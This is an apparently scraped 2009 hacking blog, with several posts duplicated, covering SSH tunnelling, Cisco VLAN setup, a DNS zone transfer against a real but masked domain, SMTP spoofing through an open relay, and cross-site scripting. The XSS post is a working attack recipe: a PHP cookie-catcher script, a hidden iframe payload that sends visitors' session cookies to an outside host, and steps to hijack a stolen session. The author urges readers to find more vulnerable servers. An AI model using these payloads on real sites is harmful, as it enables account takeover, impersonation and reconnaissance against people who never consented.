Then I configure my web browser to use it as a proxy.
Any viola an SSH tunnel. In the future I will go into more about using it as say a RDP tunnel and etc...
Tuesday, December 29, 2009
SSH Tunnel
I figured I will do a quick post on SSH Tunnel. I will be tunneling to the wcosug server using putty. I configure tunnels on putty as such
Then I configure my web browser to use it as a proxy.
Any viola an SSH tunnel. In the future I will go into more about using it as say a RDP tunnel and etc...
Then I configure my web browser to use it as a proxy.
Any viola an SSH tunnel. In the future I will go into more about using it as say a RDP tunnel and etc...
Wednesday, December 23, 2009
Cisco DTP Hack
Well unfortunate I wasn't able to get this to work. I will try again over Christmas I was not able to pick up any DTP packets. I'm going to have to do more research on it.
Tuesday, December 22, 2009
Configure Cisco Router
Well this is going to be a two part hack. I configured a cisco switch for 3 diffrent VlAN's I'll be using 2 of the VLAN's please look at the config for any questions this is on a Catalyst 3500 XL switch.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.
Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.
Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing
Switch(config)#interface
% Incomplete command.
Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an
interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit
(MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a
receive-only
interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and
ignore global
UDLD setting
Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp
status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5
0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- ---------
--------------------------
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.
Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.
Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.
Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.
Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing
Switch(config)#interface
% Incomplete command.
Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an
interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit
(MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a
receive-only
interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and
ignore global
UDLD setting
Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp
status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5
0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- ---------
--------------------------
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.
Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.
Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#
Monday, December 21, 2009
DNS Zone Transfer
DNS Zone transfer is when a DNS server is incorrectly configured to allow any one to ask for a DNS list of a certain domain. I wanted to find a specific example of a Zone transfer that had internal IP's on the transfer after nmaping ranges for port 53 I found one. Now you need to know the domain name in order to do the transfer and not a lot of people have Reverse DNS so I got lucky finding one that had both port 53 and 25 open. To find the name I telnet to port 25 and do a Helo request, on this one I did not need to do a Helo
C:\Users\Syrus>telnet **.192.22.105 25
220 rack1.*********.com ESMTP Postfix
Now to do the zone transfer the syntax is host -l domain name ip address or dns name of DNS server
bt ~ # host -l *********.com **.192.22.105
Using domain server:
Name: **.192.22.105
Address: **.192.22.105#53
Aliases:
*********.com has address **.192.22.105
*********.com name server ns1.*********.com.
internal.*********.com has address 192.168.60.254
internal2.*********.com has address 192.168.60.254
isc.*********.com has address **.203.105.185
isc-pi.*********.com has address **.203.105.185
mail.*********.com has address **.192.22.105
new.*********.com has address **.192.22.105
ns1.*********.com has address **.192.22.105
ns2.*********.com has address **.192.22.106
rack1.*********.com has address **.192.22.105
rack2.*********.com has address **.192.22.106
rack3.*********.com has address **.192.22.107
rack4.*********.com has address **.192.22.108
rack5.*********.com has address **.192.22.109
smtp.*********.com has address **.192.22.105
You have a good network map with some internal IP's go find some more that are vulnerable against Zone transfers.
C:\Users\Syrus>telnet **.192.22.105 25
220 rack1.*********.com ESMTP Postfix
Now to do the zone transfer the syntax is host -l domain name ip address or dns name of DNS server
bt ~ # host -l *********.com **.192.22.105
Using domain server:
Name: **.192.22.105
Address: **.192.22.105#53
Aliases:
*********.com has address **.192.22.105
*********.com name server ns1.*********.com.
internal.*********.com has address 192.168.60.254
internal2.*********.com has address 192.168.60.254
isc.*********.com has address **.203.105.185
isc-pi.*********.com has address **.203.105.185
mail.*********.com has address **.192.22.105
new.*********.com has address **.192.22.105
ns1.*********.com has address **.192.22.105
ns2.*********.com has address **.192.22.106
rack1.*********.com has address **.192.22.105
rack2.*********.com has address **.192.22.106
rack3.*********.com has address **.192.22.107
rack4.*********.com has address **.192.22.108
rack5.*********.com has address **.192.22.109
smtp.*********.com has address **.192.22.105
You have a good network map with some internal IP's go find some more that are vulnerable against Zone transfers.
SMTP Spoofing
This is an old exploit I guess you would call it. It is not available in wide use but I was playing with it over the weekend and I figured I would post it.
C:\Users\Syrus>telnet mail.*******.com 2525
220 smtp.*******.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.*******.com Hello [10.10.10.100]
MAIL FROM: user@*******.com
250 2.1.0 user@*******.com....Sender OK
RCPT TO: *******@gmail.com
250 2.1.5 *******@gmail.com
DATA
354 Start mail input; end with.
Here is my email message.
.
250 2.6.0 Queued mail for delivery
And Viola email sent from email address with no password or anything. Very Useful!
C:\Users\Syrus>telnet mail.*******.com 2525
220 smtp.*******.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.*******.com Hello [10.10.10.100]
MAIL FROM: user@*******.com
250 2.1.0 user@*******.com....Sender OK
RCPT TO: *******@gmail.com
250 2.1.5 *******@gmail.com
DATA
354 Start mail input; end with
Here is my email message.
.
250 2.6.0
And Viola email sent from email address with no password or anything. Very Useful!
XSS
Well I was testing my friends site for vulnerability and I found it was vulnerable to Cross Site Scripting. The environment I used it on was php forum. The first thing I needed to do was to see if the forum allowed user to run scripts to do this I made a new thread with the script
< script> alert("Do you work")</script>
in it. And well it worked! So the next step I made was to see if it was cookie based so in the url I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. So now you need a cookie catcher. It's a simple php script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your php script to a php supported webhosting site. I used t35. Now you are going to make an iframe. You are going to want it small as possible for its not seen so I set height width and boarder to 0 you also want to set the document location to the location of your cookie catcher
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >
Now when a user who is logged in browses to your thread you will catch his cookies in a document called cookie.html here is what the cookies looked like that I caught from my friends site
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someones cookies what do you do? Well first make sure you are logged out of the site. So now you inject there cookies into your browser you do this by typing the following in the URL
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hitting enter then refresh and you should be logged in as the user.A reason why this would not work is if the cookies are IP based meaning you need to have a certain IP in order to use those cookies.
< script> alert("Do you work")</script>
in it. And well it worked! So the next step I made was to see if it was cookie based so in the url I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. So now you need a cookie catcher. It's a simple php script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your php script to a php supported webhosting site. I used t35. Now you are going to make an iframe. You are going to want it small as possible for its not seen so I set height width and boarder to 0 you also want to set the document location to the location of your cookie catcher
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >
Now when a user who is logged in browses to your thread you will catch his cookies in a document called cookie.html here is what the cookies looked like that I caught from my friends site
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someones cookies what do you do? Well first make sure you are logged out of the site. So now you inject there cookies into your browser you do this by typing the following in the URL
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hitting enter then refresh and you should be logged in as the user.A reason why this would not work is if the cookies are IP based meaning you need to have a certain IP in order to use those cookies.
It's been a while
Well it has been a while I hope to be able to do weekly updates today I will hopefully get to new exploits up. I saw I have some comments I will try to respond to them today as well thanks for all the support!
Subscribe to:
Posts (Atom)